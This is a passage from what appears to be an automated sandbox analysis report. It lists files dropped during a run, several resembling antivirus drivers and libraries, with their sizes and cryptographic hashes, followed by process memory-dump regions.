            e7eefcf569d98a5fb14a459d949756dc00faf32ed6bda1233d9d2c79ca11531c

            SHA512

            7bfce579b601408262c0edd342cb2cb1ef1353b6b73dce5aad540eb77f56d1184f71c56ea859bc4373aac4875b8861e2cc5d9c49518e6c40d0b2350a7ab26c0e

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\instrumental_services.dll

            Filesize

            3.4MB

            MD5

            c6acd1d9a80740f8a416b0a78e3fa546

            SHA1

            7ea7b707d58bde0d5a14d8a7723f05e04189bce7

            SHA256

            db8acd14ace6d4c8d4d61016debe3c0d72677416661caf0d36e7306ed020920f

            SHA512

            46c889f4d84e2f8dc8bfd5bdc34a346aa393fc49adcbe95bc601e6d970599f579e5cb057196061c280cbfa976989c960ac2f1830fd61c0a9166f09a6c088c20d

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\key_value_storage.dll

            Filesize

            158KB

            MD5

            9bf7f895cff1f0b9ddf5fc077bac314c

            SHA1

            7e9c0ce6569c6f12c57f34597b213cd4d8f55e68

            SHA256

            d03e0af01fbcd9ce714caf3db5ca2ab3ca4a717d5fda5c99b77e09b5672498a4

            SHA512

            d416cfa9446e6c92f0805278c744cf9f8ac6a2bfb96a6e0b2d65e701472ea6feaf5742ed6cef833555188a95c613499e7e14cfe5788427ec2616cfd723021a67

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\klmd.sys

            Filesize

            368KB

            MD5

            990442d764ff1262c0b7be1e3088b6d3

            SHA1

            0b161374074ef2acc101ed23204da00a0acaa86e

            SHA256

            6c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4

            SHA512

            af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\klsl.sys

            Filesize

            87KB

            MD5

            a69adedb0d47cfb23f23a9562a4405bc

            SHA1

            9e70576571a15aaf71106ea0cd55e0973ef2dd15

            SHA256

            31eaa7f1f9872c63091f4b3ec5310686b1dd1e2123af17991a6b4679eda3f62d

            SHA512

            77abb4435d8d445f7a29cdb8a318486a96122b5cc535da7a63da0fa920980e6ad73e78b72552f6949e66b349bbdc9aa9ea202481046e478c2829c155a1045820

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\ksn_facade.dll

            Filesize

            1.3MB

            MD5

            e6db25447957c55f3d9dac2a9a55a0f0

            SHA1

            a941c1a04ea07fd76b0c191e62d9621d55447cb5

            SHA256

            6c6305c220444294179da749d639c91bb97afd507d30a322d7c1c16ccf0ac9fc

            SHA512

            1a4634245990335fccfb3d4eed858f61ca40bb1a12c919b6c737cebcdbde4727a26dac0180de226ff4e7d7229e6d379500396a00f6c235495cfacf3014df099a

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\ksn_meta.dll

            Filesize

            333KB

            MD5

            ed5f35496139e9238e9ff33ca7f173b9

            SHA1

            ed230628b75ccf944ea2ed87317ece7ee8c377c7

            SHA256

            93c5feb98eb0b3a1cfe1640f6c0025c913bf79c416bebbe5ed28e1ed19341069

            SHA512

            eb2d3a8e246b961d31ede5a6a29a268a9b81fb8abbfa83eb8e0c12a992e36404e5829a530a7fbd4ba91ba3e0c0c6c19243e4d4740fa9bdf97a25fd629bc05aca

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\msvcp140.dll

            Filesize

            439KB

            MD5

            5ff1fca37c466d6723ec67be93b51442

            SHA1

            34cc4e158092083b13d67d6d2bc9e57b798a303b

            SHA256

            5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062

            SHA512

            4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\settings.dat

            Filesize

            1KB

            MD5

            0a30b703f7c11790ee4cb6a6b37d2b52

            SHA1

            0a0f62b1d8941eeccceac80faa3c5c75b615c50c

            SHA256

            12f2b0817e2d8ad8b1c2fae6c5ec6ea81cfcfb7c722b4d0c09058c54b46aad1b

            SHA512

            6d9f9ffe04e420b8555326885c528004cc71022a5b289b356eb0c1d65f1ac5b2394fb68f16700708b0ebdbd2d46893b1aa0c54795addabdbd22439c983614c05

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\settings.kvdb

            Filesize

            11KB

            MD5

            173eee6007354de8cd873f59ffca955f

            SHA1

            395c5a7cb10d62cc4c63d2d65f849163e61cba5a

            SHA256

            17dfcf78dca415e3e7afac7519db911c0a93f36388c948aba40bcaa3176589a1

            SHA512

            465394c349dc74fd8a5c5ce5a89d65f0b0e09432d54517ea12de2bc8ccb329629dde03b0939800d30d008bedf0dca948fd84593bab7b7c8994ba041a7af1af2a

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\storage.dll

            Filesize

            301KB

            MD5

            d470615822aa5c5f7078b743a676f152

            SHA1

            f069bfff46cf0e08b2d615d5a9a289b7c9a6b85c

            SHA256

            f77657ee84fd1790d0a765ed45a1c832fbeb340cce8ce9011544295c70c1b1dc

            SHA512

            8826f0924d4444cbe60ec5b24d89f36f6619308b4058e4790e0228614226516eb312dcceb1a3ffe8c0bee8f545efbcffe1188cbf17b9f1c7fb58dad6090be1f9

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\storage.kvdb

            Filesize

            6KB

            MD5

            1a3330c4f388360e4c2b0d94fb48a788

            SHA1

            127ad9be38c4aa491bd1bce6458f99a27c6d465b

            SHA256

            01b8d0d8c7114b59f159021384c8a59535f87018a6a136a276b5a297f54d776d

            SHA512

            1fcd1e99e35dc4ec972ab63299637322a27b471d02175d56409a3a114db6259f9cd767ac054c7a2bba075f36ab62f19c8118c3dda93e37b7deda05aa2b260553

          • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\vcruntime140.dll

            Filesize

            78KB

            MD5

            a37ee36b536409056a86f50e67777dd7

            SHA1

            1cafa159292aa736fc595fc04e16325b27cd6750

            SHA256

            8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825

            SHA512

            3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

          • C:\Windows\System32\drivers\klupd_b296ad91a_klark.sys

            Filesize

            355KB

            MD5

            9cfe1ced0752035a26677843c0cbb4e3

            SHA1

            e8833ac499b41beb6763a684ba60333cdf955918

            SHA256

            3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

            SHA512

            29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

          • C:\Windows\System32\drivers\klupd_b296ad91a_klbg.sys

            Filesize

            199KB

            MD5

            424b93cb92e15e3f41e3dd01a6a8e9cc

            SHA1

            2897ab04f69a92218bfac78f085456f98a18bdd3

            SHA256

            ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

            SHA512

            15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

          • C:\Windows\System32\drivers\klupd_b296ad91a_mark.sys

            Filesize

            260KB

            MD5

            66522d67917b7994ddfb5647f1c3472e

            SHA1

            f341b9b28ca7ac21740d4a7d20e4477dba451139

            SHA256

            5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

            SHA512

            921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

          • memory/316-96-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/316-95-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/1504-54-0x000001C048D40000-0x000001C048DB1000-memory.dmp

            Filesize

            452KB

          • memory/1504-62-0x000001C048D40000-0x000001C048DB1000-memory.dmp

            Filesize

            452KB

          • memory/1504-53-0x0000000000BB0000-0x0000000000BB2000-memory.dmp

            Filesize

            8KB

          • memory/1504-61-0x000001C048D40000-0x000001C048DB1000-memory.dmp

            Filesize

            452KB

          • memory/1504-63-0x000001C048D40000-0x000001C048DB1000-memory.dmp

            Filesize

            452KB

          • memory/1844-93-0x0000000000400000-0x0000000000463000-memory.dmp

            Filesize

            396KB

          • memory/1844-92-0x0000000000400000-0x0000000000463000-memory.dmp

            Filesize

            396KB

          • memory/2540-71-0x000001DAC8340000-0x000001DAC8362000-memory.dmp

            Filesize

            136KB

          • memory/3532-107-0x0000000000860000-0x00000000009E8000-memory.dmp

            Filesize

            1.5MB

          • memory/3532-110-0x0000000000860000-0x00000000009E8000-memory.dmp

            Filesize

            1.5MB

          • memory/3532-111-0x0000000000860000-0x00000000009E8000-memory.dmp

            Filesize

            1.5MB

          • memory/3532-113-0x0000000000860000-0x00000000009E8000-memory.dmp

            Filesize

            1.5MB

          • memory/3532-105-0x0000000140000000-0x0000000140403000-memory.dmp

            Filesize

            4.0MB

          • memory/3532-108-0x0000000000860000-0x00000000009E8000-memory.dmp

            Filesize

            1.5MB

          • memory/3532-109-0x0000000000860000-0x00000000009E8000-memory.dmp

            Filesize

            1.5MB

          • memory/3532-112-0x0000000000860000-0x00000000009E8000-memory.dmp

            Filesize

            1.5MB

          • memory/4164-3-0x0000000000D20000-0x00000000011B3000-memory.dmp

            Filesize

            4.6MB

          • memory/4164-4-0x0000000000D20000-0x00000000011B3000-memory.dmp

            Filesize

            4.6MB

          • memory/4164-1-0x0000000077D54000-0x0000000077D56000-memory.dmp

            Filesize

            8KB

          • memory/4164-0-0x0000000000D20000-0x00000000011B3000-memory.dmp

            Filesize

            4.6MB

          • memory/4164-2-0x0000000000D21000-0x0000000000D8D000-memory.dmp

            Filesize

            432KB

          • memory/4164-19-0x0000000000D21000-0x0000000000D8D000-memory.dmp

            Filesize

            432KB

          • memory/4164-18-0x0000000000D20000-0x00000000011B3000-memory.dmp

            Filesize

            4.6MB

          • memory/4752-20-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/4752-16-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/4752-26-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/4752-25-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/4752-24-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/4752-23-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/4752-22-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/4752-21-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/4752-28-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/4752-27-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/5812-48-0x0000000000482000-0x000000000054C000-memory.dmp

            Filesize

            808KB

          • memory/5812-49-0x0000000000400000-0x0000000000693000-memory.dmp

            Filesize

            2.6MB

          • memory/5812-65-0x0000000000400000-0x0000000000693000-memory.dmp

            Filesize

            2.6MB

          • memory/5812-64-0x0000000000482000-0x000000000054C000-memory.dmp

            Filesize

            808KB

          • memory/6644-18072-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/6644-18074-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/6808-17633-0x0000023EFFE40000-0x0000023EFFE52000-memory.dmp

            Filesize

            72KB

          • memory/7792-17658-0x0000015F577C0000-0x0000015F577D8000-memory.dmp

            Filesize

            96KB

          • memory/8268-18193-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB

          • memory/8268-18199-0x0000000000C40000-0x00000000010D3000-memory.dmp

            Filesize

            4.6MB